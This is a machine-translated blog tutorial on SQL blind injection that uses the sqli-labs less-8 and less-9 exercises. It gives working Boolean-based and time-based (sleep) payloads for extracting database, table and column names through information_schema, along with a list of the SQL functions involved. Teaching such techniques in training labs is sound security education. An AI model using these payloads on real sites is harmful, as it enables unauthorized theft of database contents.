当前位置:网站首页>SQL blind injection (WEB penetration)
SQL blind injection (WEB penetration)
2022-07-07 12:23:00 【hcjtn】
sql Blind note (web penetration )
- sql Blind note Mainly dealing with the page face wed Use when the error response is better ( namely , Error does not echo )
Bull's blind note
Use page return still No return We can judge the desired result by changing these two states ( Boolean for 0 or 1 Two cases )
The problem solving steps :( The following examples are all based on sql-lab less-8 For example )
Get the length of the database name : ?id=1’ and (length(database()))=8-- q( utilize > < or = To determine the length of its database )
Get the database name :
?id=1’ and ascii(substr(database(),1,1))=115 Indicates from the database 1 Start taking a length ( You will get a decimal number , utilize ASCII Table converts it into letters or symbols ) The first is s、
It can also be done through burp suite To do it
Get the number of tables : ?id=1’ and (select count(*) from information_schema.tables where table_schema=‘security’)>5(=4)-- q
Get the length of the name of the table : ?id=1’and (select length(table_name) from information_schema.tables where table_schema=‘security’ limit 0,1)>5(=6)-- q Yes 6 Length
Get the name of the table : ?id=1’and (ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1)))=101-- q The first is e
Get field name :?id=1’and (ascii(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),1,1)))=105-- q The first is i
The function of Boolean blind note
- String concatenation function : Concat ,concat_ws, group_concat
- String truncation function :Substr, mid, left , right, locate
- Returns the specified ASCII Functions required by string :ascii,ord
- Returns the... Corresponding to the specified number ascii Code character :char
- String substitution :replace
- Calculate correlation : length( length ) count( Count )
Time blind note
- Time blind note :( With sql-lab less-9 For example ) The problem solving steps
The Ninth level is found according to the blind note just now, no matter what conditions are entered , The echo result is a , It is proved that the Boolean blind note just now cannot be used , Try to use time blind
Parsing library name length : ?id=1’ and if(length(database())=8,sleep(5),1)-- q( If set up , Just react in five seconds , notes : there 1 It doesn't mean anything )
Resolve database name :?id=1’ and if((ascii(substr(database(),1,1))=115),sleep(5),1)-- q The first is s
Resolve table name : ?id=1’ and if((ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1))=101),sleep(5),1)-- q The first is e
Resolve field name :?id=1’ and if((ascii(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),1,1))=105),sleep(5),1)-- q The first is i
The function of time blind :
- sleep() Hang the program for a while n by n second
- if(expr1,expr2,expr3) Judgment statement If the first statement is correct, execute the second statement If there is an error, execute the third statement .
边栏推荐
- 《通信软件开发与应用》课程结业报告
- Several methods of checking JS to judge empty objects
- 数据库系统原理与应用教程(009)—— 概念模型与数据模型
- When sink is consumed in mysql, the self incrementing primary key has been set in the database table. How to operate in Flink?
- 人大金仓受邀参加《航天七〇六“我与航天电脑有约”全国合作伙伴大会》
- Unity 贴图自动匹配材质工具 贴图自动添加到材质球工具 材质球匹配贴图工具 Substance Painter制作的贴图自动匹配材质球工具
- Mise en œuvre du codage Huffman et du décodage avec interface graphique par MATLAB
- Sort out the garbage collection of JVM, and don't involve high-quality things such as performance tuning for the time being
- Unity中SmoothStep介绍和应用: 溶解特效优化
- Let digital manage inventory
猜你喜欢
[data clustering] realize data clustering analysis based on multiverse optimization DBSCAN with matlab code
wallys/Qualcomm IPQ8072A networking SBC supports dual 10GbE, WiFi 6
Visual studio 2019 (localdb) \mssqllocaldb SQL Server 2014 database version is 852 and cannot be opened. This server supports version 782 and earlier
wallys/Qualcomm IPQ8072A networking SBC supports dual 10GbE, WiFi 6
Upgrade from a tool to a solution, and the new site with praise points to new value
Superscalar processor design yaoyongbin Chapter 8 instruction emission excerpt
【数据聚类】基于多元宇宙优化DBSCAN实现数据聚类分析附matlab代码
【神经网络】卷积神经网络CNN【含Matlab源码 1932期】
超标量处理器设计 姚永斌 第8章 指令发射 摘录
Explore cloud database of cloud services together
随机推荐
Visual studio 2019 (localdb) \mssqllocaldb SQL Server 2014 database version is 852 and cannot be opened. This server supports version 782 and earlier
Let digital manage inventory
(to be deleted later) yyds, paid academic resources, please keep a low profile!
MATLAB實現Huffman編碼譯碼含GUI界面
Superscalar processor design yaoyongbin Chapter 8 instruction emission excerpt
SwiftUI Swift 内功之 Swift 中使用不透明类型的 5 个技巧
@What happens if bean and @component are used on the same class?
Idea 2021 Chinese garbled code
C#中在路径前加@的作用
NGUI-UILabel
Completion report of communication software development and Application
Mastering the new functions of swiftui 4 weatherkit and swift charts
数据库系统原理与应用教程(011)—— 关系数据库
Swiftui swift internal skill: five skills of using opaque type in swift
《通信软件开发与应用》课程结业报告
【神经网络】卷积神经网络CNN【含Matlab源码 1932期】
数据库系统原理与应用教程(009)—— 概念模型与数据模型
Camera calibration (1): basic principles of monocular camera calibration and Zhang Zhengyou calibration
消息队列消息丢失和消息重复发送的处理策略
Simple network configuration for equipment management